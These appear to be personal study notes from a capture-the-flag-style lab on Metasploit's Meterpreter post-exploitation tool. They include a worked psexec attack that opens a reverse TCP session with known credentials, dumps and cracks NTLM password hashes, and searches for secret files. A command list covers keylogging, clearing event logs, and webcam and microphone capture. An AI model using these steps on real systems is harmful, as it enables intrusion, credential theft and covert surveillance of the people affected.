Meterpreter
Post attack module
run after a successful exploit to achieve penetration

In Meterpreter
	getpid
gets current Meterpreter Linux or Windows process id
	ps
lists all running processes
	tasklist /m /fi "pid eq 1304"
shows process running with pid 1304

	msvenom --list payloads | grep meterpreter
lists all msvenom payloads which use mterpreter
some payloads have a default meterpreter payload
eg ms17_010_eternalblue
	use exploit/windows/smb/ms17_010_eternalblue
	show payloads
** every meterpreter version has different command options
	help
	
Migration
ps shows word processor running as pid 716
	migrate 716
migrate to pid 716 to begin interracting with it
	keyscan_start
start keylogging
	keyscan_stop
stop keylogging
	keyscan_dump
dump keylog

Hashdump
	hashdump
lists the contents of the SAM database (security account manager) on Windows systems
stored as NTLM hashes
may be able to discover the password using rainbow tables
can be used as is with "pass-the-hash" attacks to log in on same network

Search
	search
find files, similar to linux find command

Shell
	shell
launch a regular cli shell on target system
use CTRL+Z to background your shell and return to meterpreter

Example Penetration

	setg rghosts 10.10.136.15
	search psexec
	use 10
exploit/windows/smb/psexec
	show options
	set smbuser ballen
	set smbpass Password1
	run
	sysinfo
	background
	sessions
	search windows enum_shares
	use 0
	show options
	set session 1
	run
shares found
SYSVOL
NETLOGON
speedster
	sessions 1
return to meterpreter
	ps | grep lsass.exe
find pid of lsass service
	migrate 760
move meterpreter to lsass service
	hashdump
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
this is the NTLM hash							69596c7aa1e8daee17f8e78870e25a5c	
	http://crackstation.net
Trustno1
	search -f secrets.txt
meterpreter > search -f secrets.txt
Found 1 result...
   c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt (35 bytes)
	cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
My Twitter password is KDSvbsw3849!
	search -f realsecret.txt
Found 1 result...
    c:\inetpub\wwwroot\realsecret.txt (34 bytes)
	cat "c:\inetpub\wwwroot\realsecret.txt"
The Flash is the fastest man alive

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:bed0cc82aac032eefd27988a2201bf17:::


	msf5 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.10.136.15     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.132.87     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

	
	run
	
	[*] Started reverse TCP handler on 10.10.132.87:4444 
	[*] 10.10.136.15:445 - Connecting to the server...
	[*] 10.10.136.15:445 - Authenticating to 10.10.136.15:445 as user 'ballen'...
	[*] 10.10.136.15:445 - Selecting PowerShell target
	[*] 10.10.136.15:445 - Executing the payload...
	[+] 10.10.136.15:445 - Service start timed out, OK if running a command or non-service executable...
	[*] Sending stage (176195 bytes) to 10.10.136.15
	[*] Meterpreter session 1 opened (10.10.132.87:4444 -> 10.10.136.15:49574) at 2022-11-24 05:05:47 +0000

meterpreter > 
	
	

Core commands
	background		Backgrounds the current session
	exit			Terminate the Meterpreter session
	guid			Get the session GUID (Globally Unique Identifier)
	help			help menu
	info			Displays information about a Post module
	irb				Interactive Ruby shell on the current session
	load			Loads one or more Meterpreter extensions
	migrate			Migrate Meterpreter to another process
	run				Executes a Meterpreter script or Post module
	sessions		Quickly switch to another session

File system commands
	cd				Change directory
	ls or dir		List files in the current directory
	pwd				print working directory
	edit			edit file
	cat				prints contents of file to screen
	rm				remove file
	search			search for a file
	upload			upload file to a directory
	download		download file or entire directory

Networking commands

arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table

System commands

clearev: Clears the event logs
execute: Executes a command
getpid: Shows the current process identifier
getuid: Shows the user that Meterpreter is running as
kill: Terminates a process
pkill: Terminates processes by name
ps: Lists running processes
reboot: Reboots the remote computer
shell: Drops into a system command shell
shutdown: Shuts down the remote computer
sysinfo: Gets information about the remote system, such as OS

Other Commands (these will be listed under different menu categories in the help menu)

idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database

